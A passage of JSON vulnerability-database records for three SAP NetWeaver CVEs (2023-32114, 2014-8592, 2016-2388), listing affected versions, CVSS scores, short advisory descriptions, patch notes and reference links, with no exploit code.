"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
}
]
},
"cve": "CVE-2023-32114",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "LOW",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.2,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-32114",
"trust": 1.0,
"value": "LOW"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-32114",
"trust": 1.0,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202306-865",
"trust": 0.6,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver (Change and Transport System) - versions 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an authenticated user with admin privileges to maliciously run a benchmark program repeatedly in intent to slowdown or make the server unavailable which may lead to a limited impact on Availability with No impact on Confidentiality and Integrity of the application.\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
}
],
"trust": 1.0
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-32114",
"trust": 1.6
},
{
"db": "CNNVD",
"id": "CNNVD-202306-865",
"trust": 0.6
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"id": "VAR-202306-1289",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:59:02.770000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Remediation of resource management error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=242174"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-400",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/3325642"
},
{
"trust": 1.6,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-32114/"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-06-13T03:15:09.393000",
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"date": "2023-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-06-16T18:40:36.677000",
"db": "NVD",
"id": "CVE-2023-32114"
},
{
"date": "2023-06-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Resource Management Error Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "resource management error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-865"
}
],
"trust": 0.6
}
}
var-201411-0223
Vulnerability from variot
Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request. SAP NetWeaver is prone to multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to exhaust available CPU and memory resources, denying service to legitimate users SAP NetWeaver 7.02, and 7.30 are vulnerable; other versions may also be affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0223",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.3"
}
],
"sources": [
{
"db": "BID",
"id": "71026"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8592"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Igor Ilyin, and Alexey Tyurin.",
"sources": [
{
"db": "BID",
"id": "71026"
}
],
"trust": 0.3
},
"cve": "CVE-2014-8592",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-8592",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-8592",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201411-048",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in SAP Host Agent, as used in SAP NetWeaver 7.02 and 7.3, allows remote attackers to cause a denial of service (process termination) via a crafted request. SAP NetWeaver is prone to multiple remote denial-of-service vulnerabilities. \nAn attacker can exploit these issues to exhaust available CPU and memory resources, denying service to legitimate users\nSAP NetWeaver 7.02, and 7.30 are vulnerable; other versions may also be affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"db": "BID",
"id": "71026"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8592",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005223",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201411-048",
"trust": 0.6
},
{
"db": "BID",
"id": "71026",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "71026"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"id": "VAR-201411-0223",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:39:21.186000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1986725",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8592"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://blog.onapsis.com/analyzing-sap-security-notes-october-2014-edition/"
},
{
"trust": 1.9,
"url": "https://service.sap.com/sap/support/notes/1986725"
},
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
},
{
"trust": 1.7,
"url": "http://erpscan.com/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"trust": 1.6,
"url": "https://twitter.com/sap_gsupport/status/523111735637864448"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-017-sap-netweaver-http-partial-http-post-requests-dos/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-018-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-019-sap-netweaver-j2ee-engine-partial-http-post-requests-dos/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-020-sap-netweaver-management-console-gsaop-partial-http-requests-dos/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-021-sap-netweaver-management-console-gsaop-partial-http-post-requests-dos/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/press-center/blog/sap-critical-patch-update-october-2014/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8592"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8592"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
}
],
"sources": [
{
"db": "BID",
"id": "71026"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "71026"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-17T00:00:00",
"db": "BID",
"id": "71026"
},
{
"date": "2014-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"date": "2014-11-04T15:55:07.827000",
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-17T00:00:00",
"db": "BID",
"id": "71026"
},
{
"date": "2014-11-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005223"
},
{
"date": "2018-12-10T19:29:05.640000",
"db": "NVD",
"id": "CVE-2014-8592"
},
{
"date": "2014-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201411-048"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Used in SAP Host Agent Service disruption in (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005223"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Failure to Handle Exceptional Conditions",
"sources": [
{
"db": "BID",
"id": "71026"
}
],
"trust": 0.3
}
}
var-201602-0120
Vulnerability from variot
The Universal Worklist Configuration in SAP NetWeaver AS JAVA 7.4 allows remote attackers to obtain sensitive user information via a crafted HTTP request, aka SAP Security Note 2256846. Vendors have confirmed this vulnerability SAP Security Note 2256846 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlSkillfully crafted by a third party HTTP Important user information may be obtained through a request
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0120",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver application server java",
"scope": "gte",
"trust": 1.0,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver application server java",
"scope": "lte",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.4"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_application_server_java:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "7.50",
"versionStartIncluding": "7.10",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2388"
}
]
},
"cve": "CVE-2016-2388",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-2388",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-2388",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-298",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2016-2388",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Universal Worklist Configuration in SAP NetWeaver AS JAVA 7.4 allows remote attackers to obtain sensitive user information via a crafted HTTP request, aka SAP Security Note 2256846. Vendors have confirmed this vulnerability SAP Security Note 2256846 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlSkillfully crafted by a third party HTTP Important user information may be obtained through a request",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "VULMON",
"id": "CVE-2016-2388"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39841",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2388"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-2388",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "39841",
"trust": 1.7
},
{
"db": "EXPLOIT-DB",
"id": "43495",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "137128",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "145860",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298",
"trust": 0.6
},
{
"db": "BID",
"id": "83219",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-2388",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2016-2388"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001526"
},
{
"db": "NVD",
"id": "CVE-2016-2388"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-298"
}
]
},
"id": "VAR-201602-0120",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
